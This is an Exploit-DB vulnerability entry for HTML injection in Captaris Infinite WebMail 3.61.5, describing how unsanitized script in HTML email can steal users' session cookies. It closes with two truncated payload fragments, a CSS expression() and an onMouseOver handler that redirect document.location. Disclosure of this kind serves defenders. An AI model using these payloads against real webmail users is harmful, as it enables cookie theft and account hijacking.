Captaris Infinite WebMail 3.61.5 HTML Injection Vulnerability

ID EDB-ID:22104
Type exploitdb
Reporter Pedram Amini
Modified 2002-12-16T00:00:00


Captaris Infinite WebMail 3.61.5 HTML Injection Vulnerability. Webapps exploit for php platform


An HTML injection vulnerability has been discovered in Captaris Infinite WebMail. Due to insufficient sanitization of HTML content, it is possible for an attacker to embed malicious script code into HTML email messages.

This may allow an attacker to steal cookie-based authentication credentials from users of the webmail system. Other attacks are also possible.

Launch on e-mail open:
<p style="left:expression(document.location=

Launch on mouse over:
<b onMouseOver= "document.location=